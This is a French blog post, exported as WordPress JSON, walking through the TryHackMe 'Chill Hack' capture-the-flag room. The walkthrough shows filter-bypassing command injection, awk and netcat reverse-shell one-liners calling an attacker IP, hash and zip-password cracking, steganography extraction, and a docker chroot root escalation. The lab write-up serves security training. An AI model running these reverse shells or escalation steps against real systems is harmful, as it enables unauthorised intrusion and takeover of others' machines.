{"id":404,"date":"2020-11-27T10:06:03","date_gmt":"2020-11-27T09:06:03","guid":{"rendered":"https:\/\/mikadmin.fr\/blog\/?p=404"},"modified":"2021-09-19T01:05:33","modified_gmt":"2021-09-18T23:05:33","slug":"tryhackme-chill-hack","status":"publish","type":"post","link":"https:\/\/mikadmin.fr\/blog\/tryhackme-chill-hack\/","title":{"rendered":"[TryHackme] – Chill Hack"},"content":{"rendered":"<\/span> 4<\/span> min read<\/span><\/span>

Views: 1933<\/p>\n

\"chill<\/figure><\/div>\n\n\n\n

Lien : <\/strong>https:\/\/tryhackme.com\/room\/chillhack<\/a><\/p>\n\n\n\n

La room chill hack<\/strong> est de niveau facile<\/span>.<\/p>\n\n\n\n

\n\n\n\n

[Task 1]<\/h2>\n\n\n\n
<\/div>\n\n\n\n

Dans un premier, nous allons effectuer un scan nmap<\/strong> sur la machine chill hack<\/a><\/strong> :<\/p>\n\n\n\n

<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n

On peut donc remarquer que le service FTP<\/strong> est disponible en anonyme<\/strong> avec un fichier qui se nomme note.txt<\/strong>.<\/p>\n\n\n\n

<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n

Nous avons donc l\u00e0 plusieurs indications \u00e0 noter, la premi\u00e8re \u00e9tant qu’il existe un filtre sur plusieurs strings<\/strong> dans une commande<\/strong> et la deuxi\u00e8me est que nous avons deux potentiels utilisateurs<\/strong> \u00e0 noter pour la suite : Anurodh<\/strong> & Apaar<\/strong>.<\/p>\n\n\n\n

\n\n\n\n
<\/div>\n\n\n\n

Il est temps de se diriger du c\u00f4t\u00e9 du site web<\/strong> pr\u00e9sent sur la machine :<\/p>\n\n\n\n

<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n

Nous allons donc \u00e9num\u00e9rer<\/strong> ce dernier \u00e0 l’aide de l’outil ffuf<\/span><\/strong> :<\/p>\n\n\n\n

https:\/\/github.com\/ffuf\/ffuf<\/a><\/p>\n\n\n\n

<\/div>\n\n\n\n
ffuf -u http:\/\/IP\/FUZZ -c -w \/usr\/share\/seclists\/Discovery\/Web-Content\/common.txt<\/code><\/pre>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
Bingo ! Un dossier secret<\/span><\/strong> est pr\u00e9sent sur le site web :<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"Chill<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
Il semblerait que nous puissions ex\u00e9cuter des commandes syst\u00e8mes<\/strong> cependant certaines commandes ou plut\u00f4t strings <\/strong>comme nous l’avons vu pr\u00e9c\u00e9demment sont bloqu\u00e9es<\/strong>.<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
Suite \u00e0 plusieurs tests, nous obtenons un acc\u00e8s \u00e0 la machine \u00e0 l’aide de la commande awk<\/strong> qui ne semble pas \u00eatre filtr\u00e9e :<\/p>\n\n\n\n
<\/div>\n\n\n\n
awk 'BEGIN {s = "\/inet\/tcp\/0\/10.0.0.1\/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' \/dev\/null<\/code><\/pre>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
\n\n\n\n
<\/div>\n\n\n\n
N’\u00e9tant pas tr\u00e8s fan de ce dernier je d\u00e9cide de r\u00e9cup\u00e9rer un reverse shell sur un autre port :<\/p>\n\n\n\n
<\/div>\n\n\n\n
rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|sh -i 2>&1|nc 10.11.20.104 666 >\/tmp\/f<\/code><\/pre>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
\n\n\n\n
Il semblerait que la machine dispose d’un service web<\/strong> \u00e9coutant uniquement en local sur le port 9001<\/strong> avec un panel administrateur, en inspectant ce dernier nous r\u00e9cup\u00e9rons les identifiants de connexion<\/strong> \u00e0 la base de donn\u00e9es<\/strong> :<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
Gr\u00e2ce \u00e0 ces derniers, nous trouvons une base de donn\u00e9es webportal<\/span><\/strong> contenant 2 utilisateurs avec 2 mot de passes hash\u00e9s<\/strong> en md5<\/span><\/strong> :<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
Nous retrouvons facilement le clair de ces derniers :<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
\n\n\n\n
Nous avons par la suite une piste int\u00e9ressante \u00e0 l’aide du fichier hacker.php<\/span><\/strong> :<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
Cette image semble cacher<\/strong> quelque chose et nous allons donc la r\u00e9cup\u00e9rer sur notre machine :<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
Apr\u00e8s avoir effectu\u00e9 quelques commandes basiques, nous tentons d’utiliser steghide<\/span><\/strong> :<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
Cette image contient donc un fichier backup.zip<\/span><\/strong> mais ce dernier est prot\u00e9g\u00e9 par un mot de passe et nous faisons donc appel \u00e0 john<\/span><\/strong> pour le cracker :<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
Le mot de passe de l’archive est donc pass1word<\/strong> !<\/p>\n\n\n\n
<\/div>\n\n\n\n
Cette archive contient donc un fichier php<\/strong> avec une partie tr\u00e8s int\u00e9ressante contenant un mot de passe encod\u00e9 en base64<\/strong> :<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
Nous r\u00e9cup\u00e9rons donc le mot de passe et tentons de l’utiliser pour se connecter en ssh<\/span><\/strong> avec l’utilisateur Anurodh<\/strong> :<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
\n\n\n\n
Apr\u00e8s plusieurs recherches, nous trouvons une piste int\u00e9ressante qui est docker<\/span><\/strong> :<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
Nous allons donc nous aider de Gtfobins<\/a> !<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
docker run -v \/:\/mnt --rm -it alpine chroot \/mnt sh<\/code><\/pre>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
Bingo ! Nous pouvons \u00e0 pr\u00e9sent r\u00e9cup\u00e9rer le dernier flag :<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n","protected":false},"excerpt":{"rendered":"
<\/span>  4<\/span> min read<\/span><\/span>This room provides the real world pentesting challenges. Continuer la lecture →<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":45,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_themeisle_gutenberg_block_has_review":false,"footnotes":""},"categories":[4],"tags":[25,27,26,28,22,63],"class_list":["post-404","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-infosec","tag-command-injection","tag-docker","tag-filter","tag-ftp","tag-tryhackme","tag-writeup"],"aioseo_notices":[],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts\/404","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/comments?post=404"}],"version-history":[{"count":0,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts\/404\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/media\/45"}],"wp:attachment":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/media?parent=404"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/categories?post=404"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/tags?post=404"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}